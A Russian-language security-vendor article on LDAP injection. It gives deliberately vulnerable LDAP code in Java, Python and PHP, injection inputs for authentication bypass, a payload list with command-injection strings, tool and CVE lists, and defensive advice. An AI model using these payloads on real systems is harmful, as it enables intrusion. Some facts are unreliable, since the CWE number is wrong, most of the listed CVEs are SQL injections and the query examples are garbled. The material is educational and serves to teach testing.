10 Мар, 2023

Внедрение кода через запросы LDAP

Vulnerability Assessment as a Service (VAaaS)

Tests systems and applications for vulnerabilities to address weaknesses.

LDAP (облегченный протокол доступа к каталогам) это протокол, используемый для доступа к информации каталога и управления ею. Внедрение кода через запросы LDAP относится к уязвимости в системе безопасности, при которой злоумышленник может внедрить вредоносный код в запрос LDAP, который затем может быть выполнен приложением, использующим запрос.

Вредоносный код может быть использован для выполнения различных атак, включая кражу конфиденциальных данных, изменение или удаление данных или получение несанкционированного доступа к системам. Внедрение кода с помощью запросов LDAP может произойти, когда приложение неправильно проверяет вводимые пользователем данные перед созданием запроса LDAP.

Пример уязвимого кода на разных языках программирования:


в Java:

				
					String query = "(&(uid=" + userInput + ")(userPassword=" + password + "))";
NamingEnumeration<SearchResult> results = ctx.search("dc=mydomain,dc=com", query, null);

				
			


Этот Java-код создает запрос LDAP с использованием пользовательского ввода без его проверки или очистки, что может привести к внедрению кода.

• в Python:

				
					import ldap

userInput = input("Enter a username: ")
password = input("Enter a password: ")

ldap_conn = ldap.initialize('ldap://localhost')
ldap_conn.simple_bind_s("uid=" + userInput + ",dc=mydomain,dc=com", password)

				
			


Этот код Python создает привязку LDAP с использованием пользовательского ввода без его проверки или очистки, что может привести к внедрению кода.

• в PHP:

				
					$userInput = $_POST['username'];
$password = $_POST['password'];

$ldapconn = ldap_connect("ldap://localhost");
$ldapbind = ldap_bind($ldapconn, "uid=" . $userInput . ",dc=mydomain,dc=com", $password);

				
			


Этот PHP-код создает привязку LDAP с использованием пользовательского ввода без его проверки или очистки, что может привести к внедрению кода.

Примеры внедрения кода эксплуатации через запросы LDAP

Кража данных

Злоумышленник может внедрить код в запрос LDAP, чтобы украсть конфиденциальные данные из каталога LDAP, такие как имена пользователей и пароли.

				
					Input: username=*)(uid=*))(|(uid=*
Query: (&(uid=*)(uid=*))(|(uid=*))(userPassword=*)

				
			


В этом примере злоумышленник вводит *)(uid=*))(|(uid=* в поле имя пользователя, которое вызывает запрос LDAP для поиска всех записей с пустым именем пользователя и любым паролем.

Изменение данных

Злоумышленник может внедрить код в запрос LDAP для изменения или удаления данных в каталоге LDAP, таких как информация об учетной записи пользователя.

				
					Input: username=jdoe)(|(uid=*)(userPassword=*)
Query: (&(uid=jdoe)(|(uid=*)(userPassword=*)))(&(!(|(userPassword=*))(userPassword=*))(uid=*))

				
			


В этом примере злоумышленник вводит )(|(uid=*)(userPassword=* в поле имя пользователя, которое вызывает запрос LDAP для поиска всех записей с именем пользователя “jdoe” или любым паролем, а затем изменяет или удаляет информацию учетной записи пользователя.

Получение несанкционированного доступа

Злоумышленник может внедрить код в запрос LDAP, чтобы получить несанкционированный доступ к системе, минуя проверки подлинности.

				
					Input: username=*)(uid=*))(|(uid=*
Query: (&(uid=*)(uid=*))(|(uid=*))(userPassword=*)

				
			


В этом примере злоумышленник вводит *)(uid=*))(|(uid=* в поле имя пользователя, которое заставляет запрос LDAP искать все записи с пустым именем пользователя и любым паролем, эффективно минуя проверку подлинности. Затем злоумышленник может получить несанкционированный доступ к системе.

Методы повышения привилегий для внедрения кода через запросы LDAP

Злоупотребление административными Привилегиями

Если злоумышленник может внедрить код в запрос LDAP и изменить информацию каталога LDAP, он может повысить свои привилегии, создав новую учетную запись пользователя с правами администратора или изменив привилегии существующей учетной записи пользователя.

Использование других Уязвимостей

Если злоумышленник способен внедрить код в запрос LDAP, он может использовать другие уязвимости в системе для повышения своих привилегий. Например, они могут использовать уязвимость локального повышения привилегий, чтобы получить корневой доступ к системе.

Компрометация других учетных записей

Если злоумышленник способен внедрить код в запрос LDAP и получить информацию об учетной записи пользователя, он может использовать эту информацию для компрометации других учетных записей в системе или в других системах в сети.

Атаки грубой силой

Если злоумышленник способен внедрить код в запрос LDAP и получить информацию об учетной записи пользователя, он может использовать эту информацию для выполнения атаки методом перебора паролей пользователей, что может позволить им получить доступ к дополнительным учетным записям и повысить свои привилегии.

Общая методология и контрольный список для внедрения кода через запросы LDAP

Методология:

  1. Определите запросы LDAP, используемые приложением, и любой пользовательский ввод, используемый в этих запросах.

  2. Попытайтесь ввести код в запрос LDAP, введя входные данные, которые включают специальные символы или другие кодовые конструкции, которые могут быть интерпретированы как код. Например, попробуйте ввести точку с запятой (;), апостроф (‘) или разделитель комментариев (/*), чтобы увидеть, обрабатывает ли приложение код должным образом.

  3. Используйте такой инструмент, как LDAP Injection Tool (LdapMiner) или OWASP ZAP, для автоматической проверки уязвимостей при внедрении кода. Эти инструменты могут быть использованы для создания различных тестовых примеров для выявления потенциальных уязвимостей в приложении.

  4. Проанализируйте реакцию приложения на введенный код, чтобы определить, был ли код успешно выполнен или наблюдались ли какие-либо сообщения об ошибках или другое необычное поведение.

  5. Если обнаружена уязвимость, попытайтесь повысить привилегии, изменив или удалив информацию каталога LDAP или используя уязвимость для получения несанкционированного доступа к системе.

  6. Документируйте и сообщайте о любых обнаруженных уязвимостях разработчикам приложений или группе безопасности.

  7. Убедитесь, что уязвимости были исправлены, повторно протестировав приложение после внесения любых изменений.

Контрольный список:

  1. Определите запросы LDAP, используемые приложением, и любой пользовательский ввод, используемый в этих запросах.

  2. Проверьте поля пользовательского ввода, введя специальные символы, такие как апострофы, точки с запятой или кавычки, чтобы убедиться, что приложение обрабатывает их правильно.

  3. Проверьте уязвимости при внедрении LDAP, введя входные данные, содержащие специальные символы LDAP, такие как круглые скобки, звездочки или амперсанды, и проверьте, интерпретирует ли приложение входные данные как код.

  4. Используйте автоматизированные инструменты для проверки уязвимостей при внедрении LDAP, такие как ZAP от OWASP или LdapMiner.

  5. Проверьте, нет ли сообщений об ошибках или другого необычного поведения, которое может указывать на успешную атаку с внедрением LDAP.

  6. Попытайтесь повысить привилегии, изменив или удалив информацию каталога LDAP или используя уязвимость для получения несанкционированного доступа к системе.

  7. Документируйте и сообщайте о любых обнаруженных уязвимостях разработчикам приложений или группе безопасности.

  8. Убедитесь, что уязвимости были исправлены, повторно протестировав приложение после внесения любых изменений.

  9. Внедрите проверку входных данных и очистку, чтобы предотвратить будущие уязвимости при внедрении LDAP.

  10. Обучите разработчиков методам безопасного кодирования, чтобы предотвратить будущие уязвимости при внедрении LDAP.

Набор инструментов для эксплуатации Внедрение кода через запросы LDAP

Ручные Инструменты:

  • LDAP Injection Tool: Это ручной инструмент, который можно использовать для проверки уязвимостей при внедрении LDAP, вводя специальные символы LDAP в поля ввода, чтобы увидеть, интерпретирует ли приложение их как код.

  • Ldapsearch: Это инструмент командной строки, который можно использовать для поиска информации в каталоге LDAP и для проверки уязвимостей при внедрении LDAP.

  • Burp Suite: Это инструмент тестирования безопасности веб-приложений, который включает в себя множество модулей тестирования, включая модуль для тестирования уязвимостей при внедрении LDAP.

  • Metasploit: Это инструмент тестирования на проникновение, который может быть использован для проверки на наличие различных уязвимостей, включая уязвимости при внедрении LDAP.

  • Nmap: Это инструмент отображения сети, который можно использовать для идентификации серверов LDAP и других сетевых ресурсов, которые могут быть уязвимы для атак с использованием LDAP-инъекций.

  • Wireshark: Это анализатор сетевых протоколов, который может использоваться для сбора и анализа сетевого трафика, включая запросы и ответы LDAP.

  • ldapdomaindump: Это инструмент командной строки, который можно использовать для извлечения информации о домене с сервера LDAP, что может быть полезно при выявлении потенциальных целей для атак с использованием LDAP-инъекций.

  • ldapcp: Это инструмент, который может быть использован для копирования информации каталога LDAP с одного сервера на другой, что может быть полезно при проведении целевых атак с использованием LDAP-инъекций.

Автоматизированные инструменты:

  • OWASP ZAP: Это инструмент тестирования безопасности веб-приложений с открытым исходным кодом, который включает в себя модуль для тестирования уязвимостей при внедрении LDAP.

  • Acunetix: Это инструмент тестирования безопасности веб-приложений, который включает в себя множество модулей тестирования, включая модуль для тестирования уязвимостей при внедрении LDAP.

  • Netsparker: Это инструмент тестирования безопасности веб-приложений, который включает в себя модуль для тестирования уязвимостей при внедрении LDAP.

  • AppSpider: Это инструмент тестирования безопасности веб-приложений, который включает в себя модуль для тестирования уязвимостей при внедрении LDAP.

  • Arachni: Это инструмент тестирования безопасности веб-приложений, который включает в себя модуль для тестирования уязвимостей при внедрении LDAP.

  • SQLMap: Это инструмент тестирования на проникновение, который можно использовать для проверки уязвимостей SQL-инъекций, которые иногда могут использоваться для использования уязвимостей LDAP-инъекций.

  • Wapiti: Это инструмент тестирования безопасности веб-приложений, который включает в себя модуль для тестирования уязвимостей при внедрении LDAP.

  • Skipfish: Это инструмент тестирования безопасности веб-приложений, который включает в себя модуль для тестирования уязвимостей при внедрении LDAP.

  • Nikto: Это сканер веб-сервера, который может быть использован для выявления потенциальных уязвимостей при внедрении LDAP.

  • Nessus: Это сканер уязвимостей, который может быть использован для выявления потенциальных уязвимостей при внедрении LDAP.

  • Qualys: Это облачный инструмент управления уязвимостями, который можно использовать для выявления потенциальных уязвимостей при внедрении LDAP.

  • Retina: Это инструмент управления уязвимостями, который может быть использован для выявления потенциальных уязвимостей при внедрении LDAP.

  • Security Onion: Это платформа мониторинга безопасности на базе Linux, которая включает в себя множество инструментов тестирования и анализа безопасности, включая инструменты для тестирования уязвимостей при внедрении LDAP.

  • Grendel-Scan: Это инструмент тестирования безопасности веб-приложений, который включает в себя модуль для тестирования уязвимостей при внедрении LDAP.

  • IronWASP: Это инструмент тестирования безопасности веб-приложений, который включает в себя модуль для тестирования уязвимостей при внедрении LDAP.

Средний балл CVSS внедрение стекового кода через запросы LDAP

Общая система оценки уязвимостей (CVSS) представляет собой стандартизированную систему для оценки серьезности уязвимостей в системе безопасности. Оценка варьируется от 0 до 10, причем 10 баллов являются самыми серьезными. Оценка CVSS определяется на основе нескольких факторов, включая потенциальное воздействие уязвимости, вероятность использования и сложность атаки.

Оценка CVSS для стека, включающего внедрение кода через запросы LDAP, может сильно варьироваться в зависимости от конкретной уязвимости и ее воздействия. Однако, как правило, этот тип уязвимости считается высокосерьезным, поскольку он потенциально может позволить злоумышленнику получить несанкционированный доступ к конфиденциальным данным или системам.

Средний балл CVSS для стека, включающего внедрение кода через запросы LDAP, будет зависеть от нескольких факторов, таких как сложность приложения, серьезность уязвимости и уровень доступа, предоставляемый сервером LDAP. Однако многие такие уязвимости, вероятно, будут иметь оценку CVSS в диапазоне от 7 до 9, что указывает на уязвимость высокой степени серьезности.

Общее перечисление слабых мест (CWE)

• CWE-78: Неправильная нейтрализация специальных элементов, используемых в запросе LDAP (‘Внедрение LDAP’) – Этот CWE конкретно связан с уязвимостями при внедрении LDAP.

• CWE-89: Неправильная нейтрализация специальных элементов, используемых в команде SQL (‘SQL-инъекция’) – Хотя это не относится конкретно к уязвимостям при внедрении LDAP, это CWE связано с тем, что SQL-инъекция иногда может использоваться для использования уязвимостей при внедрении LDAP.

• CWE-22: Неправильное ограничение имени пути к закрытому каталогу (‘Path Traversal’) – Этот CWE связан с тем, что запросы LDAP иногда могут использоваться для выполнения атак с обходом пути.

• CWE-434: Неограниченная загрузка файла с опасным типом – это CWE связано, потому что иногда его можно использовать для загрузки файла, содержащего код внедрения LDAP.

• CWE-352: Подделка межсайтовых запросов (CSRF) – Это CWE связано с тем, что атаки CSRF иногда могут использоваться для выполнения атак с использованием LDAP-инъекций.

• CWE-601: Перенаправление URL на ненадежный сайт (‘Open Redirect’) – Этот CWE связан, потому что иногда его можно использовать для перенаправления пользователя на сайт, который выполняет атаку с использованием LDAP-инъекции.

• CWE-79: Неправильная нейтрализация ввода во время генерации веб-страницы (‘Межсайтовый скриптинг’) – Этот CWE связан с тем, что уязвимости межсайтового скриптинга иногда могут использоваться для выполнения атак с использованием LDAP-инъекций.

• CWE-200: Передача конфиденциальной информации неавторизованному субъекту – этот CWE связан с тем, что атаки с использованием LDAP-инъекций иногда могут использоваться для раскрытия конфиденциальной информации.

• CWE-306: отсутствует аутентификация для критической функции – этот CWE связан с тем, что отсутствие аутентификации иногда может использоваться для выполнения атак с использованием LDAP-инъекций.

• CWE-319: Передача конфиденциальной информации открытым текстом – этот CWE связан, потому что он может позволить злоумышленнику перехватывать запросы и ответы LDAP, потенциально раскрывая конфиденциальную информацию.

Топ-10 CVE, связанных с внедрением кода через запросы LDAP

• CVE-2023-26033 – Gentoo soko - это код, который управляет packages.gentoo.org . Версии до 1.0.1 уязвимы для внедрения SQL, что приводит к отказу в обслуживании. Если пользователь выбирает (в настройках пользователя) представление “Недавно посещенные пакеты” для индексной страницы, значение файла cookie `search_history` используется в качестве списка атомов в кодировке base64, разделенного запятыми. Это строка, загруженная непосредственно в SQL-запрос со строкой формата `atom = ‘%s’. В результате любой пользователь может изменить значение cookie-файла браузера и ввести большинство SQL-запросов. В качестве доказательства концепции был сгенерирован искаженный файл cookie, который удалил базу данных или изменил ее содержимое. В базе данных хранятся только общедоступные данные, поэтому у пользователей сайта нет проблем с конфиденциальностью. Если известно, что база данных была изменена, полное восстановление данных возможно путем выполнения полной очистки базы данных и выполнения полного обновления всех компонентов. Эта проблема исправлена с идентификатором фиксации 5ae9ca83b73. Версия 1.0.1 содержит патч. Если пользователи не могут выполнить обновление немедленно, могут быть применены следующие обходные пути: (1.) Используйте прокси, чтобы всегда удалять файл cookie `search_history` до обновления. Влияние на пользовательский опыт невелико. (2.) Очистите файл cookie `search_history` до значения после его декодирования base64.

• CVE-2023-25719  – Управление ConnectWise до 22.9.10032 (ранее известное как ScreenConnect) не позволяет проверить предоставленные пользователем параметры, такие как Bin / ConnectWiseControl.Client.exe параметр h. Это приводит к отражению данных и внедрению вредоносного кода в загруженный исполняемый файл. Исполняемый файл может использоваться для выполнения вредоносных запросов или в качестве вектора отказа в обслуживании. ПРИМЕЧАНИЕ: эта запись CVE касается только параметров, таких как параметр h (эта запись CVE не касается отдельной проблемы подписанных исполняемых файлов, которые, как предполагается, имеют уникальные конфигурации в установках клиентов).

• CVE-2023-0895 – Плагин WP Coder – add custom html, css и js code для WordPress уязвим для SQL-инъекции на основе времени с помощью параметра ‘id’ в версиях до 2.5.3 включительно из-за недостаточного экранирования пользовательского параметра и отсутствия достаточной подготовки к существующему SQL-запросу. Это позволяет прошедшим проверку подлинности злоумышленникам с правами администратора добавлять дополнительные SQL-запросы к уже существующим запросам, которые могут быть использованы для извлечения конфиденциальной информации из базы данных.

• CVE-2022-45910 – Неправильная нейтрализация специальных элементов, используемых в запросе LDAP ("Внедрение LDAP") уязвимость в соединителях полномочий ActiveDirectory и Sharepoint ActiveDirectory Apache ManifoldCF позволяет злоумышленнику манипулировать поисковыми запросами LDAP (DoS, дополнительные запросы, манипуляции с фильтрами) во время поиска пользователя, если имя пользователя или строка домена передаются в сервлет UserACLs без проверки. Эта проблема затрагивает Apache ManifoldCF версии 2.23 и более ранних версий.

• CVE-2022-40145 – Эта уязвимость связана с потенциальным внедрением кода, когда злоумышленник контролирует целевой сервер LDAP, используя URL-адрес JDBC JNDI. Функция jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource использует InitialContext.lookup(jndiName) без фильтрации. Пользователь может изменить `options.put(JDBCUtils.ИСТОЧНИК ДАННЫХ, “osgi:” + DataSource.class.getName());` to `options.put(JDBCUtils.ИСТОЧНИК ДАННЫХ, ”jndi: rmi://x.x.x.x:xxxx/Command”);` в JdbcLoginModuleTest#настройка. Это уязвимо для атаки удаленного выполнения кода (RCE), когда конфигурация использует URI источника данных JNDI LDAP, когда злоумышленник контролирует целевой сервер LDAP.Эта проблема затрагивает все версии Apache Karaf вплоть до 4.4.1 и 4.3.7. Мы рекомендуем пользователям обновиться до Apache Karaf как минимум до 4.4.2 или 4.3.8

• CVE-2021-43035 – В устройстве резервного копирования Kaseya Unitrends, выпущенном до версии 10.5.5, была обнаружена проблема. Были обнаружены две уязвимости при внедрении SQL без проверки подлинности, позволяющие вводить произвольные SQL-запросы и выполнять их под учетной записью суперпользователя postgres. Стало возможным удаленное выполнение кода, что привело к полному доступу к учетной записи пользователя postgres.

• CVE-2021-37933 – Уязвимость внедрения LDAP в /account/login в Huntflow Enterprise до версии 3.10.6 могла позволить удаленному пользователю, не прошедшему проверку подлинности, изменять логику запроса LDAP и обходить аутентификацию. Уязвимость связана с недостаточной проверкой параметра электронной почты на стороне сервера перед использованием его для построения запросов LDAP. Злоумышленник может обойти аутентификацию, используя эту уязвимость, отправив попытки входа в систему, в которых указан действительный пароль, но подстановочный знак в параметре электронной почты.

• CVE-2021-32651 – OneDev - это платформа для разработки. Если механизм внешней аутентификации LDAP включен в версиях OneDev 4.4.1 и более ранних, злоумышленник может манипулировать пользовательским фильтром поиска для отправки поддельных запросов в приложение и исследовать дерево LDAP, используя методы слепого внедрения LDAP. Конкретная полезная нагрузка зависит от того, как настроено свойство Фильтра поиска пользователя в OneDev. Эта проблема была исправлена в версии 4.4.2.

• CVE-2021-3027 – app/views_mod/user/user.py в LibrIT PaSSHport через 2.5 зависит от внедрения LDAP. Утечка информации происходит из-за создания специальных запросов, которые обходят предусмотренный фильтр поиска, поскольку пользовательский ввод не подвергается санитарной обработке.

• CVE-2020-7356 – CAYIN xPost страдает от уязвимости при внедрении SQL-кода без проверки подлинности. Входные данные, передаваемые через параметр GET ‘wayfinder_seqid’ в wayfinder_meeting_input.jsp, не обрабатываются должным образом перед возвратом пользователю или использованием в SQL-запросах. Это может быть использовано для управления SQL-запросами путем введения произвольного SQL-кода и выполнения СИСТЕМНЫХ команд.

Внедрение кода через запросы LDAP подвиги

  • LАтака инъекцией DAP: Это наиболее распространенный тип атаки, который использует уязвимости при внедрении запросов LDAP. Злоумышленники могут манипулировать запросами LDAP для внедрения вредоносного кода, который затем выполняется на сервере LDAP.

  • Обход аутентификации: Злоумышленники могут использовать внедрение LDAP для обхода аутентификации и получения доступа к ограниченным областям приложения или сети.

  • Эксфильтрация данных: Злоумышленники могут использовать внедрение LDAP для извлечения конфиденциальных данных с сервера LDAP, таких как учетные данные пользователя или другая конфиденциальная информация.

  • Повышение привилегий: Злоумышленники могут использовать внедрение LDAP для повышения своих привилегий и получения административного доступа к серверу LDAP или другим сетевым ресурсам.

  • Отказ в обслуживании (DoS): Злоумышленники могут использовать внедрение LDAP, чтобы завалить LDAP-сервер запросами, в результате чего он выйдет из строя или перестанет отвечать.

  • Удаленное выполнение кода (RCE): В некоторых случаях уязвимости, связанные с внедрением LDAP, могут позволить злоумышленникам выполнять произвольный код на сервере LDAP, что потенциально может привести к полной компрометации системы.

  • Перечисление учетных записей: Злоумышленники могут использовать внедрение LDAP для определения действительных учетных записей пользователей на сервере LDAP, которые затем могут быть использованы для дальнейших атак.

  • Перечисление групп: Злоумышленники могут использовать внедрение LDAP, чтобы определить, какие пользователи принадлежат к определенным группам на сервере LDAP, что может помочь в дальнейших атаках.

  • Перечисление серверов: Злоумышленники могут использовать внедрение LDAP для сбора информации о сервере LDAP и его конфигурации, которая может быть полезна для планирования дальнейших атак.

  • Извлечение хэша пароля: Злоумышленники могут использовать внедрение LDAP для извлечения хэшей паролей с сервера LDAP, которые могут быть использованы для запуска автономных атак с целью взлома паролей.

Практикуясь в тестировании на Внедрение кода через запросы LDAP

Создание уязвимого приложения: Вы можете создать уязвимое веб-приложение, подверженное атакам с использованием LDAP-инъекций, а затем попытаться использовать его с помощью различных инструментов и методов.

Использование уязвимого приложения: В Интернете доступно множество уязвимых веб-приложений, которые вы можете использовать для практического тестирования уязвимостей при внедрении LDAP, таких как Чертовски уязвимое веб-приложение (DVWA).

Присоединяйтесь к событию Capture the Flag (CTF): Многие события CTF включают проблемы, связанные с безопасностью веб-приложений, включая уязвимости при внедрении LDAP. Участие в этих мероприятиях может помочь вам развить свои навыки и приобрести опыт в тестировании на наличие этих типов уязвимостей.

Используйте инструменты тестирования: Доступно множество инструментов тестирования, которые могут помочь вам выявить и использовать уязвимости при внедрении LDAP, такие как Burp Suite, OWASP ZAP и SQLMap. Вы можете использовать эти инструменты, чтобы попрактиковаться в выявлении и использовании уязвимостей в контролируемой среде.

Читайте и следуйте учебным пособиям: В Интернете доступно множество руководств, в которых содержится пошаговое руководство по выявлению и использованию уязвимостей, связанных с внедрением LDAP. Следование этим руководствам поможет вам развить свои навыки и лучше понять, как работают эти типы уязвимостей.

Посещать учебные курсы: Доступно множество учебных курсов, посвященных безопасности веб-приложений и, в частности, тестированию уязвимостей при внедрении LDAP. Посещение этих курсов может помочь вам глубже понять эти типы уязвимостей и приобрести практический опыт в их тестировании.

Для изучения внедрения кода через запросы LDAP

Внедрение OWASP LDAP: OWASP предоставляет подробный обзор атак с использованием LDAP-инъекций, включая различные типы атак, как они работают и как их предотвратить.

Шпаргалка для инъекций LDAP: Эта шпаргалка содержит краткое справочное руководство по выявлению и предотвращению уязвимостей при внедрении LDAP.

Тестирование внедрения LDAP: В этой статье представлено пошаговое руководство по тестированию уязвимостей при внедрении LDAP, включая использование различных инструментов и техник.

Академия веб–безопасности - Внедрение LDAP: Академия веб-безопасности предоставляет бесплатный онлайн-курс по внедрению LDAP, в том числе по выявлению и использованию уязвимостей при внедрении LDAP.

Внедрение кода через Внедрение LDAP: В этой статье представлен обзор того, как внедрение кода может быть достигнуто с помощью уязвимостей для внедрения LDAP.

Полезные нагрузки для внедрения LDAP: Этот ресурс предоставляет список полезных нагрузок для внедрения LDAP, которые можно использовать для проверки на наличие уязвимостей.

Лаборатория инъекций LDAP: Эта лаборатория предоставляет практический опыт тестирования уязвимостей при внедрении LDAP, включая использование таких инструментов, как Burp Suite и SQLMap.

Демонстрация внедрения LDAP: Эта демонстрация обеспечивает наглядную демонстрацию того, как атаки с использованием LDAP-инъекций могут использоваться для извлечения конфиденциальных данных с сервера LDAP.

Шпаргалка по предотвращению инъекций LDAP: Эта шпаргалка содержит краткое справочное руководство по предотвращению уязвимостей при внедрении LDAP.

Обнаружение уязвимости при внедрении LDAP: В этой статье представлен обзор того, как обнаружить уязвимости при внедрении LDAP с использованием различных методов тестирования.

Книги с обзором внедрения кода через запросы LDAP

“Администрирование системы LDAP” автор: Джеральд Картер: Эта книга представляет собой введение в LDAP и охватывает такие темы, как моделирование данных LDAP, безопасность и сетевые службы на основе LDAP.

“Программирование, управление и интеграция LDAP” автор: Клейтон Донли: В этой книге рассматриваются основы LDAP, в том числе то, как использовать его для аутентификации, авторизации и служб каталогов.

“Объясненные каталоги LDAP: введение и анализ” Брайан Аркиллс: В этой книге дается обзор каталогов LDAP и того, как они работают, в том числе как использовать их для аутентификации и авторизации.

“LDAP для ученых-ракетчиков” автор Энди Батчер: В этой книге дается подробный обзор LDAP, включая то, как использовать его для аутентификации, авторизации и служб каталогов.

“Понимание и развертывание служб каталогов LDAP” автор Тимоти А. Хоус: В этой книге рассматриваются основы LDAP, в том числе то, как использовать его для аутентификации, авторизации и служб каталогов.

“Освоение OpenLDAP” Мэтт Батчер: В этой книге дается подробный обзор OpenLDAP, в том числе о том, как использовать его для аутентификации, авторизации и служб каталогов.

“Методология предоставления метаданных LDAP: пошаговый метод реализации предоставления метаданных на основе LDAP” автор Мэтью Ньюман: В этой книге рассматривается методология предоставления доступа к метаданным LDAP и приводится пошаговое руководство по внедрению предоставления доступа к метаданным на основе LDAP.

“Руководство администратора LDAP” автор: Джеральд Картер: В этой книге дается подробный обзор администрирования LDAP, включая то, как настраивать и поддерживать каталоги LDAP.

“Понимание LDAP” Дэвид Футчер: Эта книга представляет собой введение в LDAP, в том числе о том, как использовать его для аутентификации, авторизации и служб каталогов.

“Программирование LDAP с помощью Java” автор: Роб Уэлтман: Эта книга представляет собой введение в программирование LDAP с использованием Java, в том числе о том, как использовать его для аутентификации, авторизации и служб каталогов.

Список полезных нагрузок Внедрение кода через запросы LDAP

  • *()|{0}| touch+/tmp/ldap_injection
  • *()|&{0}|echo+"LDAP+ Инъекция"+>+/tmp/ldap_injection
  • *)(uid=*))(|(uid=*))
  • *)(cn=*))(|(cn=*))
  • *)(Пароль пользователя=*))(|(Пароль пользователя=*))
  • *)(Класс объекта=*))(|(Класс объекта=*))
  • *)(|(uid=*
  • *)(|(cn=*
  • *()|&{0}|echo+"LDAP+ Инъекция"+>+/tmp/ldap_injection
  • *)(uid=*));(uid=*))

Как быть защищенным от внедрения кода с помощью запросов LDAP

  1. Проверка входных данных: Убедитесь, что весь пользовательский ввод проверен и очищен, прежде чем он будет использован в любых запросах LDAP.

  2. Используйте параметризованные запросы: Используйте параметризованные запросы или подготовленные инструкции, чтобы злоумышленники не могли вставлять вредоносный код в запросы.

  3. Доступ с наименьшими привилегиями: Используйте принцип наименьших привилегий, когда учетным записям пользователей предоставляются только те разрешения, которые необходимы для выполнения назначенных им задач.

  4. Регулярное латание: Поддерживайте все программное обеспечение и приложения в актуальном состоянии с помощью последних исправлений и обновлений безопасности.

  5. Брандмауэр и сегментация сети: Используйте брандмауэры и сегментацию сети, чтобы изолировать серверы LDAP от других систем в сети.

  6. Шифрование: Используйте шифрование, такое как SSL / TLS, для защиты конфиденциальных данных, передаваемых по сети.

  7. Аутентификация: Внедрите меры строгой аутентификации, такие как многофакторная аутентификация, для предотвращения несанкционированного доступа к серверам LDAP.

  8. Мониторинг: Контролируйте серверы LDAP на предмет подозрительной активности и внедряйте системы обнаружения и предотвращения вторжений.

  9. Тестирование безопасности: Регулярно проводите тестирование безопасности, такое как сканирование уязвимостей и тестирование на проникновение, чтобы выявить и устранить любые уязвимости.

  10. Фильтрация входных данных: Реализуйте фильтрацию входных данных, чтобы блокировать выполнение любых подозрительных символов или команд в запросах LDAP.

Заключение

Внедрение кода через запросы LDAP это серьезная уязвимость в системе безопасности, которая может позволить злоумышленникам выполнять произвольный код в уязвимых системах. Это может произойти, когда пользовательский ввод не был должным образом проверен или очищен перед использованием в запросах LDAP. Злоумышленники могут воспользоваться этой уязвимостью, чтобы внедрить вредоносный код в запросы LDAP и потенциально получить несанкционированный доступ к конфиденциальным данным или завладеть системой.

Чтобы предотвратить внедрение кода через запросы LDAP, важно реализовать проверку входных данных, параметризованные запросы, доступ с наименьшими привилегиями, регулярное исправление, сегментацию брандмауэра и сети, шифрование, строгие меры аутентификации, мониторинг и тестирование безопасности. Кроме того, фильтрация входных данных может помочь заблокировать выполнение любых подозрительных символов или команд в рамках запросов LDAP.

Организациям следует предпринимать упреждающие шаги для защиты от внедрения кода с помощью запросов LDAP и регулярно оценивать свои системы на предмет уязвимостей. Поступая таким образом, они могут помочь обеспечить безопасность и целостность своих систем и данных.

Другие Услуги

Готовы к безопасности?

Связаться с нами